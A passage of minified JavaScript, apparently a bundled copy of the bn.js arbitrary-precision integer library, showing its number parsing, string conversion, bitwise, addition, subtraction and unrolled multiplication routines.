f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,fa=0|P[2],Jt=8191&fa,Gt=fa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ua=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ua>>>26)|0,ua&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var $n=(X+(L=L+Math.imul(De,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(De,Yt)|0)+Math.imul(Ve,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ve,Yt)|0)+(h>>>13)|0)+($n>>>26)|0,$n&=67108863,L=Math.imul($e,Kt),h=(h=Math.imul($e,Zt))+Math.imul(st,Kt)|0,R=Math.imul(st,Zt),L=L+Math.imul(Oe,ti)|0,h=(h=h+Math.imul(Oe,ii)|0)+Math.imul(Te,ti)|0,R=R+Math.imul(Te,ii)|0,L=L+Math.imul(xe,Pt)|0,h=(h=h+Math.imul(xe,Xt)|0)+Math.imul(We,Pt)|0,R=R+Math.imul(We,Xt)|0,L=L+Math.imul(mt,Qt)|0,h=(h=h+Math.imul(mt,ei)|0)+Math.imul(lt,Qt)|0,R=R+Math.imul(lt,ei)|0,L=L+Math.imul(Ge,ai)|0,h=(h=h+Math.imul(Ge,$t)|0)+Math.imul(Qe,ai)|0,R=R+Math.imul(Qe,$t)|0;var Do=(X+(L=L+Math.imul(me,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(me,Yt)|0)+Math.imul(Ke,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ke,Yt)|0)+(h>>>13)|0)+(Do>>>26)|0,Do&=67108863,L=Math.imul($e,ti),h=(h=Math.imul($e,ii))+Math.imul(st,ti)|0,R=Math.imul(st,ii),L=L+Math.imul(Oe,Pt)|0,h=(h=h+Math.imul(Oe,Xt)|0)+Math.imul(Te,Pt)|0,R=R+Math.imul(Te,Xt)|0,L=L+Math.imul(xe,Qt)|0,h=(h=h+Math.imul(xe,ei)|0)+Math.imul(We,Qt)|0,R=R+Math.imul(We,ei)|0,L=L+Math.imul(mt,ai)|0,h=(h=h+Math.imul(mt,$t)|0)+Math.imul(lt,ai)|0,R=R+Math.imul(lt,$t)|0;var Mo=(X+(L=L+Math.imul(Ge,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ge,Yt)|0)+Math.imul(Qe,Ut)|0))<<13)|0;X=((R=R+Math.imul(Qe,Yt)|0)+(h>>>13)|0)+(Mo>>>26)|0,Mo&=67108863,L=Math.imul($e,Pt),h=(h=Math.imul($e,Xt))+Math.imul(st,Pt)|0,R=Math.imul(st,Xt),L=L+Math.imul(Oe,Qt)|0,h=(h=h+Math.imul(Oe,ei)|0)+Math.imul(Te,Qt)|0,R=R+Math.imul(Te,ei)|0,L=L+Math.imul(xe,ai)|0,h=(h=h+Math.imul(xe,$t)|0)+Math.imul(We,ai)|0,R=R+Math.imul(We,$t)|0;var no=(X+(L=L+Math.imul(mt,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(mt,Yt)|0)+Math.imul(lt,Ut)|0))<<13)|0;X=((R=R+Math.imul(lt,Yt)|0)+(h>>>13)|0)+(no>>>26)|0,no&=67108863,L=Math.imul($e,Qt),h=(h=Math.imul($e,ei))+Math.imul(st,Qt)|0,R=Math.imul(st,ei),L=L+Math.imul(Oe,ai)|0,h=(h=h+Math.imul(Oe,$t)|0)+Math.imul(Te,ai)|0,R=R+Math.imul(Te,$t)|0;var Kn=(X+(L=L+Math.imul(xe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(xe,Yt)|0)+Math.imul(We,Ut)|0))<<13)|0;X=((R=R+Math.imul(We,Yt)|0)+(h>>>13)|0)+(Kn>>>26)|0,Kn&=67108863,L=Math.imul($e,ai),h=(h=Math.imul($e,$t))+Math.imul(st,ai)|0,R=Math.imul(st,$t);var Sa=(X+(L=L+Math.imul(Oe,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Oe,Yt)|0)+Math.imul(Te,Ut)|0))<<13)|0;X=((R=R+Math.imul(Te,Yt)|0)+(h>>>13)|0)+(Sa>>>26)|0,Sa&=67108863;var 